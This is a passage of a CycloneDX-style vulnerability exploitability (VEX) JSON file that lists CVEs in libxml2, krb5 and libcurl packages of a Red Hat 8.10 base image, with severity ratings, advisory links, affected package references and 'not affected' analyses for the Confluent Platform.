          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0992",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "A flaw was found in the libxml2 library. This uncontrolled resource consumption vulnerability occurs when processing XML catalogs that contain repeated <nextCatalog> elements pointing to the same downstream catalog. A remote attacker can exploit this by supplying crafted catalogs, causing the parser to redundantly traverse catalog chains. This leads to excessive CPU consumption and degrades application availability, resulting in a denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0992"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0992"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429975"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1019"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0992"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0992"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-06-30T20:17:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11850",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        191
      ],
      "description": "An integer underflow vulnerability was found in MIT krb5 in the berval2tl_data() function in plugins/kdb/ldap/libkdb_ldap/ldap_principal2.c. The function performs an unsigned subtraction (bv_len - 2) without a prior bounds check. When bv_len is 0 or 1, the subtraction wraps to a large value which is then truncated to uint16_t, yielding 0xFFFE (65534) or 0xFFFF (65535). The subsequent malloc succeeds and memcpy reads up to 65534 bytes from a 0-1 byte buffer, resulting in a heap out-of-bounds read.\nThe attack vector involves a malicious or compromised LDAP KDB backend returning a krbExtraData attribute with bv_len < 2, triggering the underflow when the KDC or kadmind reads principal data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11850"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25520"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11850"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2459970"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11850"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8585-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11850"
        }
      ],
      "published": "2026-06-11T10:16:21+00:00",
      "updated": "2026-06-17T10:14:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.18.2-34.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.18.2-34.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.18.2-34.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/krb5-libs@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/krb5-workstation@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libkadm5@1.18.2-34.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11856",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        294
      ],
      "description": "Successfully using libcurl to do a transfer to a specific HTTP origin\n(`hostA`) with **Digest** authentication and then changing the origin to a\ndifferent one (`hostB`) for a second transfer, reusing the same handle, makes\nlibcurl wrongly pass on the  `Authorization:` header field meant for `hostA`,\nto `hostB`.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11856"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11856"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11856.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11856.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-9crq-qh8v-6xmm"
        },
        {
          "url": "https://hackerone.com/reports/3793260"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11856"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11856"
        }
      ],
      "published": "2026-07-03T07:16:23+00:00",
      "updated": "2026-07-07T19:43:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
